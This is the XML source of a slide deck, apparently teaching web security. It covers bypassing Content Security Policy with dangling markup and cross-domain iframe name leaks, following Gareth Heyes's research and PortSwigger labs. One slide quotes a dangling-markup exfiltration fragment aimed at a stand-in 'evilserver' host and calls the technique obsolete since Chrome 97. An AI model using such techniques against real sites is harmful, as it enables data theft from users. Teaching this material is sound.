                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="406" name="Google Shape;406;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="944675" y="234302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By Gareth Heyes</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="407" name="Google Shape;407;p28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1197575"/>
            <a:ext cx="7396975" cy="6275"/>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392328" y="146358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392328" y="216493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74" y="1506326"/>
            <a:ext cx="317091" cy="3170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84" y="2195144"/>
            <a:ext cx="308041" cy="3080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760" y="1463586"/>
            <a:ext cx="4900713" cy="272028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814" b="50060"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="201553" y="2785140"/>
            <a:ext cx="3166587" cy="20255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What Will You Learn?</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s" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- What is CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How does Cross Domain Iframe happens?</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 Now you had understand all basic attacks concepts , time to learn full technique on bypassing CSP with Dangling Iframes!</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s" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Try perform the attack within yourself using provided Portswigger labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Resources for learning</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pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- What is it for?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- How does it work?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- How to bypass it?</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pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- How does it exist?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- What’s the effect?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- How to perform one?</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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- The usage of this technique</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- The purpose of this attack</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408670" y="2085751"/>
            <a:ext cx="2342600" cy="21102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Content Security Policy (CSP)</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MY" dirty="0" smtClean="0"/>
              <a:t>XSS Injection</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Dangling Markup Injection</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Cross-Domain Attack</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Bypassing CSP With Dangling Iframes</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Proof Of Concept (POC)</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902" y="1809407"/>
            <a:ext cx="663517" cy="6635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205" y="2711374"/>
            <a:ext cx="743245" cy="74324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848" y="3702606"/>
            <a:ext cx="635115" cy="63511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582" y="1869212"/>
            <a:ext cx="693670" cy="69367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9582" y="2676002"/>
            <a:ext cx="743245" cy="74324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5815" y="3634051"/>
            <a:ext cx="772224" cy="77222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2000" dirty="0" smtClean="0"/>
              <a:t>1. Perform Dangling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Markup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Injection Without &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>img-src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Directive</a:t>
            </a:r>
            <a:endParaRPr sz="20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226181" y="1295997"/>
            <a:ext cx="9038746" cy="1600438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From Chrome 97, Dangling Markup Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="https://evilserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>technique </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>no longer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>worked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>different attributes and CSS-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>animations has been </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tried by Gareth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heyes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>this protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>But it all fails. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In conclusion, old tricks of bypassing CSP using Dangling Markup Injection wont work on latest update of Chrome 97, so lets see other alternatives that we can use to bypass an extremely secured latest CSP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY"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7694"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2697151" y="2951330"/>
            <a:ext cx="3789169" cy="2054845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1230853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lvl="0"/>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" dirty="0" smtClean="0"/>
              <a:t>2. Start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Hackbility</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" dirty="0" smtClean="0"/>
              <a:t> inspector</a:t>
            </a:r>
            <a:endParaRPr sz="20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226181" y="951908"/>
            <a:ext cx="9038746" cy="1169551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>First, start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hackability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> inspector which is a security-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>focussed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enumerator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>coded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>by Gareth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heyes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Then, began </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>analyse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the inner workings of iframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Inspector is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>important to test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>multiple domains for cross-domain leaks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY"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4" y="1911551"/>
            <a:ext cx="5606274" cy="2993180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14122340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lvl="0"/>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" dirty="0" smtClean="0"/>
              <a:t>3. Cross-Domain iframe issues</a:t>
            </a:r>
            <a:endParaRPr sz="20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153818" y="984800"/>
            <a:ext cx="9038746" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the first iframe and inside that instance, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>another </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe, below is an example of iframe named “test”:</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY"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31" y="1323379"/>
            <a:ext cx="3350229" cy="611914"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="153818" y="2243846"/>
            <a:ext cx="8520600" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Then from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parent iframe, inspect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the cross domain window with the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY"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31" y="2582425"/>
            <a:ext cx="2889474" cy="643041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="187967" y="3502892"/>
            <a:ext cx="8452301" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Result:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inspector showed the name of the iframe as "test" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>then means that a cross-domain iframe can discover the iframe name attribute.</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1383108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lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Determine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>if the name exists or not.</a:t>
            </a:r>
            <a:endParaRPr sz="20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153818" y="984800"/>
            <a:ext cx="9038746" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can ask yes/no questions on the name attribute of any cross-domain iframe:</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY"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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="147507" y="3371989"/>
            <a:ext cx="8452301" cy="1046440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Conclusion:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is good, but doesn't really help </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bypass the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We might </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>determine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if the name exists or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not by asking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yes / no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>questions, but our main goal is to bypass the CSP. Lets see what we can do next.</a:t>
            </a:r>
